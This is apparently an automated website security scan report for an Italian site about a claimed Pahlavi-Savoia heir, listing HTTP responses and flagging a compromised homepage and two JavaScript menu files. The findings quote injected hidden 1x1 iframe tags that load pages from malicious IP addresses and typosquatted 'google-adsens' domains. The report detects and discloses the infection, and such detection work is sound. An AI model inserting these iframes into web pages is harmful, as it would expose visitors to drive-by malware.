Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lastoriaincredibile.org
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://lastoriaincredibile.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 05:58:03 GMT Location: http://www.lastoriaincredibile.org/ Server: Apache Content-Length: 243 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lastoriaincredibile.org/ | 200 OK Content-Length: 5792 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 91.142.214.164 <html> <head> <title>Monhud Palhevi Savoia - La storia incredibile</title> <meta name="AUTHOR" content="monhud.inchallah@palhevisavoia.org"> <meta name="description" content="La storia del figlio legittimo dello Scià di Persia Reza Pahlavi e della Principessa Maria Gabriella di Savoia"> <meta name="keywords" content="Pahlavi, Savoia, Monhud, Pahlevi, Palhevi, Persia, Iran, Teheran, Golestan, Go ...[4334 bytes skipped]... Hidden iFrame found. size: 1x1 src: http://31.184.242.81/link.php <iframe src=http://31.184.242.81/link.php width=1 height=1 frameborder=0> Malicious iFrame found. The same iFrame was found in 45 websites. size: 1x1 src: http://91.142.214.164/cache/link.php This URL is marked by Google as suspicious <iframe src=http://91.142.214.164/cache/link.php width=1 height=1 frameborder=0> | ||
http://www.lastoriaincredibile.org/home.php | 200 OK Content-Length: 51263 Content-Type: text/html | clean |
http://www.lastoriaincredibile.org/script/data.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.lastoriaincredibile.org/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.lastoriaincredibile.org/script/home2a.js | 404 Not Found Content-Length: 214 Content-Type: text/html | clean |
http://www.lastoriaincredibile.org/script/home2.js | 404 Not Found Content-Length: 213 Content-Type: text/html | clean |
http://lastoriaincredibile.org/vita.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 05:58:05 GMT Location: http://www.lastoriaincredibile.org/vita.php Server: Apache Content-Length: 251 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lastoriaincredibile.org/vita.php | 200 OK Content-Length: 47164 Content-Type: text/html | clean |
http://www.lastoriaincredibile.org/script/espandi.js | 404 Not Found Content-Length: 215 Content-Type: text/html | clean |
http://lastoriaincredibile.org/script/home2a.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 05:58:05 GMT Location: http://www.lastoriaincredibile.org/script/home2a.js Server: Apache Content-Length: 259 Content-Type: text/html; charset=iso-8859-1 | clean |
http://lastoriaincredibile.org/script/home2.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 05:58:06 GMT Location: http://www.lastoriaincredibile.org/script/home2.js Server: Apache Content-Length: 258 Content-Type: text/html; charset=iso-8859-1 | clean |
http://lastoriaincredibile.org/tribunali.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 05:58:06 GMT Location: http://www.lastoriaincredibile.org/tribunali.php Server: Apache Content-Length: 256 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lastoriaincredibile.org/tribunali.php | 200 OK Content-Length: 61464 Content-Type: text/html | clean |
http://lastoriaincredibile.org/inglese/home.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 05:58:07 GMT Location: http://www.lastoriaincredibile.org/inglese/home.php Server: Apache Content-Length: 259 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lastoriaincredibile.org/inglese/home.php | 200 OK Content-Length: 52849 Content-Type: text/html | clean |
http://www.lastoriaincredibile.org/inglese/script/data.js | 404 Not Found Content-Length: 220 Content-Type: text/html | clean |
http://lastoriaincredibile.org/inglese/script/home2a.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 05:58:08 GMT Location: http://www.lastoriaincredibile.org/inglese/script/home2a.js Server: Apache Content-Length: 267 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lastoriaincredibile.org/inglese/script/home2a.js | 200 OK Content-Length: 11015 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var NoOffFirstLineMenus=10; var LowBgColor='#FFFF33'; var LowSubBgColor='#FFFF33'; var HighBgColor='#000066'; var HighSubBgColor='#000066'; var FontLowColor='#000066'; var FontSubLowColor='#000066'; var FontHighColor='white'; var FontSubHighColor='white'; var BorderColor='#990000'; var BorderSubColor='#990000'; var BorderWidth=1; var BorderBtwnElmnts=1; var FontFamily="arial,comic sans ms,technical" var FontSize=9; var FontBold=1; var FontItalic=0 Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://google-adsens.com/in.cgi?2 <iframe src="http://google-adsens.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"> Hidden iFrame found. size: 1x1 src: http://google-adsenc.com/in.cgi?2 <iframe src="http://google-adsenc.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"> | ||
http://lastoriaincredibile.org/inglese/script/home2.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 11 Jan 2015 05:58:07 GMT Location: http://www.lastoriaincredibile.org/inglese/script/home2.js Server: Apache Content-Length: 266 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.lastoriaincredibile.org/inglese/script/home2.js | 200 OK Content-Length: 26899 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var AgntUsr=navigator.userAgent.toLowerCase(); var DomYes=document.getElementById?1:0; var NavYes=AgntUsr.indexOf('mozilla')!=-1&&AgntUsr.indexOf('compatible')==-1?1:0; var ExpYes=AgntUsr.indexOf('msie')!=-1?1:0; var Opr=AgntUsr.indexOf('opera')!=-1?1:0; var Opr6orless=window.opera && navigator.userAgent.search(/opera.[1-6]/i)!=-1 var DomNav=DomYes&&NavYes?1:0; var DomExp=DomYes&&ExpYes?1:0; var Nav4=NavYes&&!DomYes& Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://google-adsenc.com/in.cgi?2 <iframe src="http://google-adsenc.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"> Hidden iFrame found. size: 1x1 src: http://google-adsens.com/in.cgi?2 <iframe src="http://google-adsens.com/in.cgi?2" name="twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lastoriaincredibile.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 11 Jan 2015 05:58:03 GMT
Location: http://www.lastoriaincredibile.org/
Server: Apache
Content-Length: 243
Content-Type: text/html; charset=iso-8859-1
...243 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: lastoriaincredibile.org
Referer: http://www.google.com/search?q=lastoriaincredibile.org
Result:
The result is similar to the first query. There are no suspicious redirects found.